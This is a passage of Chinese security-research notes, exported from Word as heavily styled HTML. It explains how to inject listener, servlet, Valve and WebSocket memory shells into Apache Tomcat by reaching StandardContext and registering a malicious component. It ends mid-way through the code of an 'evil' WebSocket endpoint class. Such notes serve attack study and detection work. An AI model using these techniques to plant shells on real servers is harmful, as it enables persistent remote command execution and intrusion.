style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">中的其中的内容将直接输出到浏览器的页面中</span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://www.yuque.com/tianxiadamutou/zcfd4v/na64yv" target="_blank">https://www.yuque.com/tianxiadamutou/zcfd4v/na64yv</a></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">和</span></span></span><a href="https://mp.weixin.qq.com/s?__biz=MzAwMzc2MDQ3NQ==&mid=2247484941&idx=1&sn=13d495d796e0846acd002579cd36ef12&scene=21#wechat_redirect" data-linktype="2"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;">https://mp.weixin.qq.com/s/USIn50RITRF87AigssRyaA</span></span></span></a><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">中listener内存马搭配食用</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">两个添加内存马使用的方法不一样，但都是获取standardcontext并在ApplicationEventListener数组里添加listener</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">根据调试可以看到获取到的request变量的值就是RequestFacade实例，obj为ApplicationContextFacade实例，这个实例的classCache属性为hashmap，其中的value包含多个方法对应的获取的属性值的类，</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">他的context属性中的context属性包含Standardcontext</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">向数组添加listener</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:listener内存马;"><span style="font-family:Cambria;">之后就会触发执行命令了</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:servlet内存马;"><span style="font-family:Calibri;">servlet内存马</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">1.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:servlet内存马;"><span style="font-family:Cambria;">创建恶意Servlet</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">2.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:servlet内存马;"><span style="font-family:Cambria;">用Wrapper对其进行封装</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">3.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:servlet内存马;"><span style="font-family:Cambria;">添加封装后的恶意Wrapper到StandardContext的children当中</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">4.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:servlet内存马;"><span style="font-family:Cambria;">添加ServletMapping将访问的URL和Servlet进行绑定</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:servlet内存马;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:servlet内存马;"><span style="font-family:Cambria;">webappClassLoaderBase的值为ParallelWebappClassLoader实例</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:servlet内存马;"><span style="font-family:Cambria;">Resources为StandardRoot，context为我们要的StandardContext</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:servlet内存马;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:servlet内存马;"><span style="font-family:Cambria;">如果是java7会报错</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:servlet内存马;"><span style="font-family:Cambria;">原因是getResources返回对象为null，强制类型转换时出错抛出null指针错误</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:servlet内存马;"><span style="font-family:Cambria;"></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:valve内存马;"><span style="font-family:Calibri;">Valve内存马</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:valve内存马;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://www.anquanke.com/post/id/225870" target="_blank">https://www.anquanke.com/post/id/225870</a></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:valve内存马;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://www.freebuf.com/articles/web/348663.html" target="_blank">https://www.freebuf.com/articles/web/348663.html</a></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:valve内存马;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:valve内存马;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:valve内存马;"><span style="font-family:Cambria;">给standardcontext中的pipeline添加valve，添加后的next如下</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:valve内存马;"><span style="font-family:Cambria;"></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Calibri;">Websocket内存马</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://xz.aliyun.com/t/11566" target="_blank">https://xz.aliyun.com/t/11566</a></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">1.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">获取当前的StandardContext</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">2.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">通过StandardContext获取ServerContainer</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">3.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">定义一个恶意类，并创建一个ServerEndpointConfig，给这个恶意类分配URI path</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">4.</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">调用ServerContainer.addEndpoint方法，将创建的ServerEndpointConfig添加进去</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">org</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">apache</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">catalina</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">core</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">StandardContext</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">org</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">apache</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">catalina</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">loader</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">WebappClassLoaderBase</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">org</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">apache</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">tomcat</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">websocket</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">server</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">WsServerContainer</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">javax</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">websocket</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.*;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">javax</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">websocket</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">server</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">ServerContainer</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">javax</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">websocket</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">server</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">ServerEndpointConfig</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">java</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">io</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">InputStream</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> evil </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">extends</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Endpoint</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 